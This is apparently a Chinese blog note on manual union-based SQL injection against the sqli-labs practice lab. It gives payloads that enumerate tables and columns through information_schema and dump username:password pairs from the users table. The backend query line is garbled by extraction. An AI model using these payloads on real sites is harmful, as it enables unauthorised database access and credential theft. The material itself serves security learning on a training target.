-
sql注入Less-2
后台sql
s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = sql = "SELECT * FROM users WHERE id= sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1";
注入语句
http://192.168.200.26/Less-3/?id=-1? union select 1,2,database();–+
使用id=-1 便可以显示union的内容了
使用–+注释掉 limit后面的内容group_concat(table_name) 去重
通过回显判断闭合方式
尝试手工注入流程:
1.判断有无注入点 and 1 = 1; true
SQL注入:
随便输入内容 == 报错 注入
== 没有注入2.猜解列名数量 order by %20 空格
字段 4个- 1
3.报错,判断回显点 union
4.信息收集
数据库版本 version()
高版本:5.0
系统库: infromation 。。。
数据库名称:database()
低版本:5.0 (低版本没有系统库)5.使用对应SQL进行注入
查询出表名
数据库库名:security . 下一级 infromation_schema.tables 查找表名 table_name 查询serurity库下面 所有的表名 database() = 前后 连到一起 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
查询出所以密码
表: users 如何查询表里面有那些字段? user 字符 转行 16进制 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273 username password 字段数据 select username,password from users 0x3a : union select 1,2,(select group_concat(username,0x3a,password)from users)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
-
相关阅读:
【四】相机标定
Graph Convolutional Module for Temporal Action Localization in Videos GCM论文阅读笔记
【Mysql】Innodb数据结构(四)
【云原生】k8s-----集群调度
【100天精通Python】Day53:Python 数据分析_NumPy数据操作和分析进阶
web概述09
使用Terraform管理已经存在的kubernates和默认的节点池
Mysql---三张表(student,课程,分数) 查询课程为数学的学生姓名,编号,成绩
工程水文学复习资料
Android进阶宝典 -- 手写RecyclerView分页组件
- 原文地址:https://blog.csdn.net/qq_38595432/article/details/132919564